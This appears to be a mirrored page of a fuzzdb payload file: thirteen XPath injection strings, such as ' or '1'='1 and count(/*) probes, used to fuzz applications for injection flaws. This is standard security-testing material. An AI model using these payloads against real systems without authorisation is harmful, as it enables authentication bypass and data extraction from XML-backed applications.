mirror of
https://github.com/fuzzdb-project/fuzzdb.git
synced 2024-11-27 05:20:20 +00:00
13 lines
209 B
Text
13 lines
209 B
Text
|
' or '1'='1
|
||
|
' or ''='
|
||
|
x' or 1=1 or 'x'='y
|
||
|
/
|
||
|
//
|
||
|
//*
|
||
|
*/*
|
||
|
@*
|
||
|
count(/child::node())
|
||
|
x' or name()='username' or 'x'='y
|
||
|
' and count(/*)=1 and '1'='1
|
||
|
' and count(/@*)=1 and '1'='1
|
||
|
' and count(/comment())=1 and '1'='1
|